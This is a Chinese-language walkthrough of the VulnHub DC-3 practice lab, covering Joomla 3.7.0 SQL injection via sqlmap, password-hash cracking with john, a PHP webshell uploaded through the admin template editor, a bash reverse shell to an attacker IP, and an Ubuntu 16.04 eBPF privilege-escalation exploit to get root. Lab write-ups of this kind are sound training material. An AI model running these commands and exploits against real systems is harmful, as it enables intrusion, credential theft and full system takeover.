VulnHub_DC-3
DC-3 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
与之前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个flag、一个入口点并且根本没有任何线索。
必须具备 Linux 技能和熟悉 Linux 命令行,以及一些使用基本渗透测试工具的经验。
对于初学者,Google 可以提供很大的帮助,但您可以随时通过 @DCAU7 向我发送推文以寻求帮助,让您重新开始。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
对于那些有过 CTF 和 Boot2Root 挑战经验的人来说,这可能根本不会花费您很长时间(事实上,它可能会花费您不到 20 分钟的时间)。
如果是这样的话,并且如果你想让它更具挑战性,你可以随时重做挑战并探索其他获得根和旗帜的方法。
探测靶机
nmap 192.168.157.0/24
nmap -sV -A -p- 192.168.157.144
检测一下网站的框架,为Joomla框架
joomscan扫描
用Joomla专门的CMS扫描器扫描
joomscan --url http://192.168.157.144
发现Joomla的版本为 3.7.0
查询漏洞信息
查看是否有相关漏洞信息
searchsploit Joomla 3.7.0
有个SQL的漏洞,查看详细信息
searchsploit -x php/webapps/42033.txt
接下来按着打就行
sqlmap攻击
sqlmap -u "http://192.168.157.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -batch
查表
sqlmap -u "http://192.168.157.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb' --tables -p list[fullordering] -batch
查看#__users表里面的内容
sqlmap -u "http://192.168.157.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb' -T '#__users' --columns -p list[fullordering]
查询username、password字段里面的内容
sqlmap -u "http://192.168.157.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D 'joomladb' -T '#__users' -C 'username,password' --dump -p list[fullordering] -batch
john爆破密码
把密码写入pass.txt,用john爆破一下秒出
john pass.txt
登入后台文件上传
登入后台,网址是之前扫描到的 http://192.168.157.144/administrator/
找到文件上传的位置,新建一个shell.php
shell.php的路径为
http://192.168.157.144/templates/beez3/html/shell.php
蚁剑连接
反弹shell
反弹shell是为了后面的提权做准备,蚁剑是一个基于HTTP的临时连接工具,连接易中断,不适合进行提权这种需要持续交互输入命令的操作。所以蚁剑的作用就在于上传文件来提权。
kali开启监听
nc -lnvp 9999
在蚁剑的终端
bash -c 'bash -i >& /dev/tcp/192.168.157.131/9999 0>&1'
再次访问一下shell.php,监听成功
现在需要的是从www-data权限提权到root
Ubuntu 16.04提权漏洞
获取当前操作系统的版本信息
cat /proc/version
获取当前操作系统的发行版信息
cat /etc/issue
查找一下Ubuntu 16.04的提权漏洞
searchsploit Ubuntu 16.04
这里选用这个漏洞,查看详细信息
searchsploit -x php/webapps/39772.txt
按着打,先去github下载攻击压缩包
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
.......原文件没了,找到了别的师傅上传的
https://github.com/p4sschen/ubuntu16-39772.zip-exp
用蚁剑在对应目录上传 39772.zip
在监听端查看发现上传成功后接着exp打
unzip 39772.zip #解压29772.zip文件
cd 39772
tar -xvf exploit.tar #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit
执行代码,进行提权,获取root权限
./compile.sh
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
等待片刻后取得root权限,我比较喜欢反弹一个完整的shell环境
python -c 'import pty;pty.spawn("/bin/bash")'
取得flag
查找发现flag文件位置,取得flag
标签:提权,渗透,fields,list,DC,192.168,--,VulnHub,php From: https://www.cnblogs.com/Mar10/p/17444666.html